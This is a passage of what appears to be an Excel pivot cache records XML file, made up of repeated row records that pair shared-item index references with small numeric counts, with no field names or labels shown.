  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="388"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="389"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="389"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="389"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="389"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="389"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="389"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="389"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="389"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="389"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="389"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="389"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="389"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="389"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="389"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="354"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="390"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="390"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="390"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="390"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="390"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="390"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="390"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="20"/>
    <x v="390"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="390"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="390"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="390"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="390"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="390"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="390"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="391"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="391"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="391"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="391"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="391"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="391"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="391"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="391"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="391"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="391"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="391"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="391"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="391"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="391"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="392"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="392"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="392"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="392"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="18"/>
    <x v="392"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="12"/>
    <x v="392"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="392"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="11"/>
    <x v="392"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="392"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="392"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="26"/>
    <x v="392"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="81"/>
    <x v="392"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="392"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="392"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="393"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="393"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="393"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="393"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="393"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="393"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="393"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="393"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="393"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="393"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="393"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="393"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="393"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="393"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="394"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="394"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="394"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="394"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="394"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="394"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="394"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="394"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="394"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="394"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="394"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="394"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="394"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="394"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="395"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="395"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="395"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="395"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="395"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="395"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="395"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="395"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="395"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="395"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="395"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="6"/>
    <x v="395"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="395"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="395"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="396"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="396"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="396"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="396"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="396"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="396"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="20"/>
    <x v="396"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="105"/>
    <x v="396"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="396"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="396"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="113"/>
    <x v="396"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="153"/>
    <x v="396"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="396"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="396"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="397"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="397"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="397"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="397"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="397"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="397"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="397"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="397"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="397"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="397"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="397"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="397"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="397"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="397"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="307"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="307"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="307"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="307"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="18"/>
    <x v="307"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="25"/>
    <x v="307"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="307"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="307"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="172"/>
    <x v="307"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="307"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="398"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="398"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="398"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="398"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="398"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="398"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="398"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="398"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="398"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="398"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="398"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="398"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="398"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="398"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="399"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="399"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="399"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="399"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="399"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="399"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="399"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="399"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="399"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="399"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="399"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="399"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="399"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="399"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="400"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="400"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="400"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="400"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="400"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="400"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="400"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="400"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="400"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="400"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="400"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="400"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="400"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="400"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="401"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="401"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="401"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="401"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="401"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="401"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="401"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="401"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="401"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="401"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="401"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="401"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="401"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="401"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="402"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="402"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="402"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="402"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="402"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="9"/>
    <x v="402"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="402"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="402"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="402"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="402"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="33"/>
    <x v="402"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="402"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="402"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="402"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="403"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="403"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="403"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="403"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="403"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="9"/>
    <x v="403"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="403"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="403"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="403"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="403"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="33"/>
    <x v="403"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="403"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="403"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="403"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="404"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="404"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="404"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="404"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="404"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="404"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="404"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="404"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="404"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="404"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="404"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="404"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="404"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="404"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="405"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="405"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="405"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="405"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="405"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="405"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="405"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="405"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="405"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="405"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="405"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="405"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="405"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="405"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="406"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="406"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="406"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="406"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="406"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="406"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="406"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="406"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="406"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="406"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="406"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="406"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="406"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="406"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="407"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="407"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="407"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="407"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="407"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="407"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="30"/>
    <x v="407"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="220"/>
    <x v="407"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="407"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="407"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="407"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="407"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="407"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="407"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="408"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="408"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="408"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="408"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="408"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="408"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="408"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="408"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="408"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="408"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="23"/>
    <x v="408"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="12"/>
    <x v="408"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="408"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="408"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="325"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="75"/>
    <x v="325"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="103"/>
    <x v="325"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="15"/>
    <x v="325"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="150"/>
    <x v="325"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="300"/>
    <x v="325"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="409"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="409"/>
  </r>
